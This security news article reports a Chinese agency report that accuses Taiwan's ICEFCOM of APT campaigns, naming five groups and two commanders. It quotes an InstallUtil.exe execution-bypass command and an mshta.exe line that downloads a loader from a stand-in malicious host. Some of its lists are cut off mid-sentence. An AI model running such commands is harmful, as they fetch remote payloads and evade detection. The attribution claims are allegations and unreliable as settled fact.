Chinese cybersecurity agencies, backed by leading research labs and security firms, have publicly accused Taiwan’s Information, Communications and Electronic Force Command (ICEFCOM), allegedly supported by the United States, of orchestrating a multi-year campaign of Advanced Persistent Threat (APT) attacks targeting critical infrastructure and sensitive entities across mainland China, Hong Kong, and Macao.
The investigation, released today by the National Computer Virus Emergency Response Center and 360 Digital Security Group, details an extensive web of cyber espionage operations attributed to so-called “T-APTs” hacker groups said to be acting on behalf of Taiwan’s Democratic Progressive Party (DPP) and under ICEFCOM’s direction.
Attack Chain and Notable Tools
The report singles out five major APT groups — APT-C-01 (“Poison Vine”), APT-C-62 (“Viola Tricolor”), APT-C-64 (“Anonymous 64”), APT-C-65 (“Neon Pothos”), and APT-C-67 (“Ursa”) — as core threat actors. Each group purportedly specializes in targeting different sectors via a range of tactics, techniques, and procedures (TTPs). The hallmarks of their operations include:
.docx, .pdf, .rtf, .lnk.A representative code snippet illustrates how InstallUtil.exe is abused for stealthy execution:
bashC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe
Such tactics blend legitimate system operations with malicious intent, making detection challenging.
Examples of Malware in Use
The joint investigation notes that while the attackers demonstrate planning and technical proficiency, their toolkit heavily relies on public, open-source software and widely known exploits rather than zero-day vulnerabilities. Incident responses often revealed tell-tale signs of operational sloppiness, such as obvious language traces and re-used phishing templates.
A typical attack progression:
.lnk masquerading as a PDF..lnk triggers execution of a remote HTA file via mshta.exe, downloading a loader:textmshta.exe http://malicious-site.com/loader.htaICEFCOM’s Structure and “Foreign Collusion” Allegations
Analysts identified ICEFCOM Taiwan’s military-linked cyber command as the organizational hub for these activities, with over 6,000 personnel and roots in U.S. cyber doctrine. The report alleges a close operational link to the U.S. Cyber Command, especially since high-profile arms deals and joint defense forums in 2024.
Profiled leaders including Commander Jian Hua-ching and Deputy Commander Wang Yue-yang — were named, with detailed backgrounds, as a warning of further “tracking and exposure.” The mainland’s agencies vow to escalate countermeasures and international legal action.
Despite the breadth of the campaign, the assessment labels the threat groups as technically second-tier, citing:
While China’s technical attribution of the cyberattacks to Taiwan’s ICEFCOM and, by extension, the United States, constitutes one of the most detailed accusations to date, the debate over the true scope and direction of these APT groups is likely to escalate.
The exposure of TTPs and malware hashes, alongside calls for international cooperation against “foreign cyber subversion,” marks a new chapter in both cyber-warfare and cross-Strait tensions.
Whether these claims lead to diplomatic fallout, technical countermeasures, or new cybersecurity doctrines, one thing is clear: the cyber battlefield across the Taiwan Strait is rapidly evolving.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…